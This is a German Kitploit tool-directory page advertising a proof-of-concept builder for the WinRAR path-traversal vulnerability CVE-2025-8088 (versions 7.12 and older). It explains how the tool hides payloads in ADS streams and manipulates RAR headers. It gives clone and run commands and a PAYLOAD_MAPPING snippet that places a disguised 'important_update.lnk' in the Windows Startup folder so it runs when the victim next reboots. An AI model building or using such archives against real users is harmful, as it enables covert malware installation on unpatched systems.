Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-8088-WinRAR-builder — Ein POC-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Versionen 7.12 und älter betrifft. | Kitploit
Tools/GitHubGitHub/papcaii2004/cve-2025-8088-winrar-builder
SchwachstellenanalyseExploitationWebanwendungs-ExploitationMalware-AnalysePayload-Entwicklung
GitHubpapcaii2004/cve-2025-8088-winrar-builder

CVE-2025-8088-WinRAR-builder

Ein POC-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die Versionen 7.12 und älter betrifft.

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-8088-WinRAR-builder

Ein POC-Exploit für die WinRAR-Schwachstelle (CVE-2025-8088), die Versionen 7.12 und älter betrifft

🚀 So funktioniert es

  1. Erstellt ein RAR-Archiv mit eingebetteten anderen Payloads
  2. Verwendet mehrere ADS-Streams 🔄 - Hängt Payload-Streams mit unterschiedlichen Path-Traversal-Tiefen an
  3. Manipuliert RAR-Header ⚙️ - Modifiziert die Archivstruktur, um die Path-Traversal-Schwachstelle auszunutzen
  4. Legt Payload im Autostart ab 📂 - Versucht, den Payload beim Extrahieren in den Windows-Autostart-Ordner zu schreiben

🛠️ Verwendung

  1. Repository klonen
root@kitploit:~
git clone https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder.git
cd CVE-2025-8088-WinRAR-builder
  1. Payloads vorbereiten
root@kitploit:~
mkdir payloads
  • Füge deine Payloads zu diesem Ordner hinzu (exe, dll, lnk, ...)
  • Ändere PAYLOAD_MAPPING im Skript
root@kitploit:~
# 2. Ordne deinen Payload dem entsprechenden Ziel zu
#   Format: (dateiname_im_payloads_ordner, ziel_extrahier_pfad)
PAYLOAD_MAPPING: List[Tuple[str, str]] = [
    # Payload 1
    ("payload.lnk", "..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\important_update.lnk"),

    # Payload 2
    ("image.png", "C:\\Users\\Public\\Downloads\\logo.png"),

    # Payload 3
    # Füge deinen eigenen hinzu    
]
  1. Exploit ausführen
root@kitploit:~
python builder.py <decoy_file>

🔄 Ausführungsablauf

  1. Das Opfer extrahiert das RAR mit verwundbarem WinRAR (≤7.12)
  2. Der Payload wird in den Zielordner geschrieben, z. B.:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Beim nächsten Neustart ➡️ wird der Payload automatisch ausgeführt

📋 Anforderungen

  • Windows-Betriebssystem 🪟
  • Python 3.x 🐍
  • WinRAR installiert
Tool herunterladen